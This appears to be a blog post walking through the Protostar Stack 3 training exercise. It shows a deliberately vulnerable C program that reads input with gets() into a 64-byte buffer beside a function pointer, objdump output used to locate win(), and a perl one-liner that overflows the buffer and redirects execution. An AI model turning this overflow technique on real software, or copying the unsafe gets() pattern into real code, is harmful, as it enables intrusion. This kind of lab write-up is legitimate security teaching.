MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Exploit Exercises - Protostar Stack 3

| Comments

This challenge starts getting a little bit more involved than the previous ones. Instead of just providing a new value for the “modified” variable, we need to make the code jump to a method, changing the execution.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 volatile int (*fp)();
 char buffer[64];

 fp = 0;

 gets(buffer);

 if(fp) {
  printf("calling function pointer, jumping to 0x%08x\n", fp);
  fp();
 }
}

This means that first of all, we need to find the address of where the “win()” function is located in the program. To do this, I used objdump, however you could use gdb as well, or any other disassembly program. I have cut the useful part of the output below, since it gives a lot of information we don’t need.

1
2
3
4
5
6
7
8
9
10
11
12
user@protostar:/opt/protostar/bin$ objdump -d stack3
...

08048424 <win>:
8048424:       55                      push   %ebp
8048425:       89 e5                   mov    %esp,%ebp
8048427:       83 ec 18                sub    $0x18,%esp
804842a:       c7 04 24 40 85 04 08    movl   $0x8048540,(%esp)
8048431:       e8 2a ff ff ff          call   8048360 <puts@plt>
8048436:       c9                      leave
8048437:       c3                      ret
...

From this, we can now see that the “win()” function is located at 0x08048424 in the memory. So if we can get our program to jump there, it will execute that code. Luckily the “fp” pointer in the code gets called if it is not equal to 0. We just need to overwrite it with the memory value of “win()” by doing the following:

1
2
3
user@protostar:/opt/protostar/bin$ perl -e 'print "A"x64 . "\x24\x84\x04\x08"' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Comments